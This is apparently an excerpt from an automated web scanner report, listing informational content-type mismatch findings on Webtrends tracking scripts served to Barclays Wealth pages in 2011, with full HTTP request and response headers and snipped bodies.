GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fa7b06e8a285cd8557c816bb73a1054dd6f61c085541b14b0f1cdc85bbc6c13104c5d4e138b4441efe4d0df29ac219ca9f33aa597333f06094a72f0b8693f583078ca7a20868390dd09a51f64f9632368b476625a1b97fdeb7fbe3ee2e9f15fc753db61b44d95d1c6d908adf73080ff95a857114d212e9df7fc023f7926c1affcf77ff603dec1e90cc59b840d67c805e76b06755b56dc15c816627f1e4749c07ae4b98253a37795a90f6d2ffd57b3693a6c9d99ecaa3c9a7a2527c08b4dbd7d1ef687965b66d7c1e975c8c4819341ab9128d14f9b1bdee50ad380f57e1607502342b902a0c35352af2b371709e343f483515143f0fc99e12cb86a0b22ab052728728bd3c0c456974ff8bd27744064404e26ad0fccbe513db005298de7110f64ccb4609be6beaa96988e67faccfed7a085828f21c9bea0b2773172bd891771d4d836ccdfffa31f995b8fc42887cb3575827453bccd907351c104cefba115a4bd9ee95130217e8bdfa0cd23ab3116e9c89e3d09b38184a5fe50c93587e762fa74be77fcad2faca5a3666a5599e4a86d7e4ecc7733b506d0fa6cc09cf1a56faa0dc59bfccaa26dd86f48b704209a9012b257d48680e37e775f52dbd038c4b143731ce21cd7914c25b15db25224b3bee5373935f185a89d99254f340d0f11ef6b280f8fa7d57a97bf7dff879d0253f5789af0b4e906e0259ea13157c8af715fefae0a517c4043d0ed61354c4279387ad91fbc67362e5ee491d9b9428d5ab48c026f3da596a3f7140ea7890f9f1807be6793e6641163ac21e4d1318d29893e16c3721d3cb0243980354f494882062679b747f4ca7f6919cb7407796802197808477612c0082bf53eb1a8d28c4b903e4cc0b860aefb0c1b29d53ab33f3cbd0809f1cac8b43fb29fd469fdc6b6ab046e78448d743a93ea6e917e4e43311dabd2011e0744e9affd57dfa06865fb7252769bab308d9291514a338c41bbfe2d3d9c5fe539f021722ba6875a46b9ae61b01352b7bd8133bc0aef41132a2109c99b6de15c83543f0a38fc8db26aad571263c1ddcd13d64d45ea865522576347b3f0d0d044a746f350acb15f7ff8856755a7c3212ab422a680e6ec1ae07755dccf9ed00d5cb749d874ca9a0bd514f81777a17f65d705af40a5d948ae67c37c6c3f9e9a1d8be17ac7c4e82a33f87f30d2454a9bb4bfdb2fbd7483e61a6a0cc5f955742fc6ec1cb515d04b739fb HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-infinite-credit-card.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=DF89E5BAA7A71BDFFD734919F4B8C6D8; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200988e87; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d04610a68; _wt.mode-79569=fcdcc722e93202c8abcc

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:18 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=4274AF1E58216E26E0C3901397ECB67E; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932029c8164; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2008dfa14; Expires=Sun, 01-Jan-2012 00:02:19 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.52. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fc7f16e2bac9d79708c50bf372bb011bcef75d195f4ab356470c9fcda4caf90136b4fd8c4e926d24d97b0eb9dbcb5a8aff45d83f1e109708e3c30731cdc9f3840fc3a7a0143c365b818e56ff1dc73d6ecc56644eb3a56cfdc888e8a74bc251be3275e34e1ac03862018d97dd492c6fc35b877512cc01dae84ce61df7b64626c7de12ae2565ac4fc5a605fb02920dc1052cef7041a76cc8589b7c30b6ba24da6ffa0bce7e2d236b1ed2b395f1db2a0082a0a1c999ccb9c6aab9133844f3c3d9958c5e4314854f6b15d701d9585326708751cc48fdf1b5a803e26b0d56e13c7257372cc1325c653c29f3b3717e9e34211b3242403900c5921a98cca2e47abe547e8625b13a1415786befb2b934520a4215ec71d4e2c0ff47dc1b519a8e2017ff47904709a826a9c20299f424f7d9b26b0f4c35e670a6ae4b7c6b027799946e1f188769cbfea730f796afae58d86aa01603215571dfc0400b0f0257b8b31e1a5ad4b38f105811ecb7b31e865ce6181e8a9fb69ee6345e7c49b6499728042e34fe5ce4729c84af9d01356ff4549842d482bfbf922038533f0af49904931657f6a1cb14afaa9b4effeed499720401fa163132412e7b4d68b365f93bb414881817626cc923cf7712880e14d920714634ee0e278e5c4a5e8ede9a5bf84ed5ea4ef6b081fba12756a17bbcdbeb30934e59109bf55e089e7c0445e608122e93f542fcffe0a416cb0f6f1d9e043afd36d28bf8d6f5d72478aaf920278d837d9ab8108027bf8d0b6d3d7c41e424cca9ea8136b4662f74194271d35f07097594dc8db4303c6594974c428d6516b683c83b675d87720709e1a3cae8fa521584d667c1a3a2297b2344d4bb09b64d8f2991ab4af3a54d9715a3a197f68201a331a797cadf884ea1d113ad78ad1699da6738b218b3d01ed440ad38fdbd44b4b06314deb47d16e4761a9dfb852ffb07d602bc202d39bee704da281510f739c44ceae7858ecff80794041524ee6a7fa76f99e71c06357b71de4c39c7f9f44432a51698ceb2db169e6548f3afd69edc76ffd7722f6e1cda863d30d65eac6c052622667e3f010f064e236d6454ce1af4f28902255f226117fe447834596e93f700700ec0adbd04869f76cf831aa9b0a21776c33a3042a85f734ef4000b93d6a670209691a5bcfb8cb940f0714ed3a23386fd5b7e51a9ae52e2fe054e9eaa  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fc7f16e2bac9d79708c50bf372bb011bcef75d195f4ab356470c9fcda4caf90136b4fd8c4e926d24d97b0eb9dbcb5a8aff45d83f1e109708e3c30731cdc9f3840fc3a7a0143c365b818e56ff1dc73d6ecc56644eb3a56cfdc888e8a74bc251be3275e34e1ac03862018d97dd492c6fc35b877512cc01dae84ce61df7b64626c7de12ae2565ac4fc5a605fb02920dc1052cef7041a76cc8589b7c30b6ba24da6ffa0bce7e2d236b1ed2b395f1db2a0082a0a1c999ccb9c6aab9133844f3c3d9958c5e4314854f6b15d701d9585326708751cc48fdf1b5a803e26b0d56e13c7257372cc1325c653c29f3b3717e9e34211b3242403900c5921a98cca2e47abe547e8625b13a1415786befb2b934520a4215ec71d4e2c0ff47dc1b519a8e2017ff47904709a826a9c20299f424f7d9b26b0f4c35e670a6ae4b7c6b027799946e1f188769cbfea730f796afae58d86aa01603215571dfc0400b0f0257b8b31e1a5ad4b38f105811ecb7b31e865ce6181e8a9fb69ee6345e7c49b6499728042e34fe5ce4729c84af9d01356ff4549842d482bfbf922038533f0af49904931657f6a1cb14afaa9b4effeed499720401fa163132412e7b4d68b365f93bb414881817626cc923cf7712880e14d920714634ee0e278e5c4a5e8ede9a5bf84ed5ea4ef6b081fba12756a17bbcdbeb30934e59109bf55e089e7c0445e608122e93f542fcffe0a416cb0f6f1d9e043afd36d28bf8d6f5d72478aaf920278d837d9ab8108027bf8d0b6d3d7c41e424cca9ea8136b4662f74194271d35f07097594dc8db4303c6594974c428d6516b683c83b675d87720709e1a3cae8fa521584d667c1a3a2297b2344d4bb09b64d8f2991ab4af3a54d9715a3a197f68201a331a797cadf884ea1d113ad78ad1699da6738b218b3d01ed440ad38fdbd44b4b06314deb47d16e4761a9dfb852ffb07d602bc202d39bee704da281510f739c44ceae7858ecff80794041524ee6a7fa76f99e71c06357b71de4c39c7f9f44432a51698ceb2db169e6548f3afd69edc76ffd7722f6e1cda863d30d65eac6c052622667e3f010f064e236d6454ce1af4f28902255f226117fe447834596e93f700700ec0adbd04869f76cf831aa9b0a21776c33a3042a85f734ef4000b93d6a670209691a5bcfb8cb940f0714ed3a23386fd5b7e51a9ae52e2fe054e9eaa

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fc7f16e2bac9d79708c50bf372bb011bcef75d195f4ab356470c9fcda4caf90136b4fd8c4e926d24d97b0eb9dbcb5a8aff45d83f1e109708e3c30731cdc9f3840fc3a7a0143c365b818e56ff1dc73d6ecc56644eb3a56cfdc888e8a74bc251be3275e34e1ac03862018d97dd492c6fc35b877512cc01dae84ce61df7b64626c7de12ae2565ac4fc5a605fb02920dc1052cef7041a76cc8589b7c30b6ba24da6ffa0bce7e2d236b1ed2b395f1db2a0082a0a1c999ccb9c6aab9133844f3c3d9958c5e4314854f6b15d701d9585326708751cc48fdf1b5a803e26b0d56e13c7257372cc1325c653c29f3b3717e9e34211b3242403900c5921a98cca2e47abe547e8625b13a1415786befb2b934520a4215ec71d4e2c0ff47dc1b519a8e2017ff47904709a826a9c20299f424f7d9b26b0f4c35e670a6ae4b7c6b027799946e1f188769cbfea730f796afae58d86aa01603215571dfc0400b0f0257b8b31e1a5ad4b38f105811ecb7b31e865ce6181e8a9fb69ee6345e7c49b6499728042e34fe5ce4729c84af9d01356ff4549842d482bfbf922038533f0af49904931657f6a1cb14afaa9b4effeed499720401fa163132412e7b4d68b365f93bb414881817626cc923cf7712880e14d920714634ee0e278e5c4a5e8ede9a5bf84ed5ea4ef6b081fba12756a17bbcdbeb30934e59109bf55e089e7c0445e608122e93f542fcffe0a416cb0f6f1d9e043afd36d28bf8d6f5d72478aaf920278d837d9ab8108027bf8d0b6d3d7c41e424cca9ea8136b4662f74194271d35f07097594dc8db4303c6594974c428d6516b683c83b675d87720709e1a3cae8fa521584d667c1a3a2297b2344d4bb09b64d8f2991ab4af3a54d9715a3a197f68201a331a797cadf884ea1d113ad78ad1699da6738b218b3d01ed440ad38fdbd44b4b06314deb47d16e4761a9dfb852ffb07d602bc202d39bee704da281510f739c44ceae7858ecff80794041524ee6a7fa76f99e71c06357b71de4c39c7f9f44432a51698ceb2db169e6548f3afd69edc76ffd7722f6e1cda863d30d65eac6c052622667e3f010f064e236d6454ce1af4f28902255f226117fe447834596e93f700700ec0adbd04869f76cf831aa9b0a21776c33a3042a85f734ef4000b93d6a670209691a5bcfb8cb940f0714ed3a23386fd5b7e51a9ae52e2fe054e9eaa HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/debit-cards.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A3D550880A45CA7718800D08622321F7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=e1f36dbd085f00297bec; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2002e7571

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:17 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.mode-79569=e1f36dbd085f0088adcd; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200988e87; Expires=Sun, 01-Jan-2012 00:02:17 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.53. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5725a79065efa59d13f9854b8ffb4ff341cffa3c6c9da58c217b271a6094a91e104586061876c763ee9b299bde51a0fdfcafe22b51b43b81151e38bd553d9ab12d86842469408e2c25235d69ff48909d6a1a40767224ad1f142eb09b156138703056de3ff2bcdf6bfed885ff56d970342c76a45c00c442ea6aafb451028e858ac6409ca0ea7ba1aa3549cfe1f7c9fcb1eb83a6dac42c0a61ffc049613d21d3baf2c09e51a9d1cda3830fff136da5cfa5d813450463c1ecda7d2e9d53971c4e5be8dd29cf8d8aab3083f4ee0cececa81041e15c81f6d158200d1530d2e73c856ca48afa6bef559bb3f1057f274626e5869d7695f243e3ff6a47b6697323f483515143f0fc99e12cb8abda344d8123fd373a73000456974ff8bd27744065c04e26ad0fcc2f813dc1b5a92d77e13e144dd4f11e933a595458fb03eedba83077f2a47f279e6f61b6874486c0577b8e5  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5725a79065efa59d13f9854b8ffb4ff341cffa3c6c9da58c217b271a6094a91e104586061876c763ee9b299bde51a0fdfcafe22b51b43b81151e38bd553d9ab12d86842469408e2c25235d69ff48909d6a1a40767224ad1f142eb09b156138703056de3ff2bcdf6bfed885ff56d970342c76a45c00c442ea6aafb451028e858ac6409ca0ea7ba1aa3549cfe1f7c9fcb1eb83a6dac42c0a61ffc049613d21d3baf2c09e51a9d1cda3830fff136da5cfa5d813450463c1ecda7d2e9d53971c4e5be8dd29cf8d8aab3083f4ee0cececa81041e15c81f6d158200d1530d2e73c856ca48afa6bef559bb3f1057f274626e5869d7695f243e3ff6a47b6697323f483515143f0fc99e12cb8abda344d8123fd373a73000456974ff8bd27744065c04e26ad0fcc2f813dc1b5a92d77e13e144dd4f11e933a595458fb03eedba83077f2a47f279e6f61b6874486c0577b8e5

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5725a79065efa59d13f9854b8ffb4ff341cffa3c6c9da58c217b271a6094a91e104586061876c763ee9b299bde51a0fdfcafe22b51b43b81151e38bd553d9ab12d86842469408e2c25235d69ff48909d6a1a40767224ad1f142eb09b156138703056de3ff2bcdf6bfed885ff56d970342c76a45c00c442ea6aafb451028e858ac6409ca0ea7ba1aa3549cfe1f7c9fcb1eb83a6dac42c0a61ffc049613d21d3baf2c09e51a9d1cda3830fff136da5cfa5d813450463c1ecda7d2e9d53971c4e5be8dd29cf8d8aab3083f4ee0cececa81041e15c81f6d158200d1530d2e73c856ca48afa6bef559bb3f1057f274626e5869d7695f243e3ff6a47b6697323f483515143f0fc99e12cb8abda344d8123fd373a73000456974ff8bd27744065c04e26ad0fcc2f813dc1b5a92d77e13e144dd4f11e933a595458fb03eedba83077f2a47f279e6f61b6874486c0577b8e5 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2D0CE6DA7B82936A31CBC9ACE233AAA7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e93200beff43; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=74DD24DA05D7E85933AC1283D8E7C849; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932037bbb78; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2003676f9; Expires=Sun, 01-Jan-2012 00:02:06 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.54. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2f67577bacd75f1782291db413e5148500103e9901f9138f3ecc45e1a17351e327846c1b8e797a0b3a413d308571a1642331ee41fbb8e7a116b4a76f41fdcb35b053e4fd0d4f4887a3e6fa9f9444be3347958846ece8717f653867a1bb55d084039dae6cd593e38cf3381b76f9412798114c13eee60d18ac04040f44e23a0def691164a4690571135ce1499229d752a7fbf8e53656e8a18bdf9f1fd25ae761ed3c7dec882b3b64609e6a6e20dbcfbcdb912759d584f823b5185ca4150ce4959a07dcff5ac53a16139211b0cb556cd69fb48a1dcba5d60771222daaf009b778966d228b012178fdd609edcf90d5924bf310972473f54a1ffc20583ba6b3c76a1733f00ac936579c56bdb60da65a9ef207789fc91bb93a6ca847c3b11dee47cf4582777ca82607b566da1ccb2577e7ff60f75eeb51d8656a6b645d99f3c6ead5327d90edb68d8e9ff88afbe1146d49e4ce9dc38c05471a854c68478d038a5b022672d555ce40ada2b5ad02e6380f00e53b7603302fc6375e60652af6ee7c7f9733204e3717403e0196c249c4cea1b479e5537d8a22e039104d2d3cbcb2ba35565e471fb92980b396aa148d4d55cfdb2344aa46c14907ae71fac1059caa22f88cb5610a1b30e974a7a71d2e3e002299986f1f1d8463caf5a530f393a3fc5a8866ff455326077ad9c3410e595256efb41a1d5a83b0801c5841eee0e1418a5ce41416d89bb7cfe1310a2c13b91d927d592168f95eb77fc9d4ae95593766a20e9843d6d2ffa2d61a7e41725babc745d8400eeeafd00dbbc4e2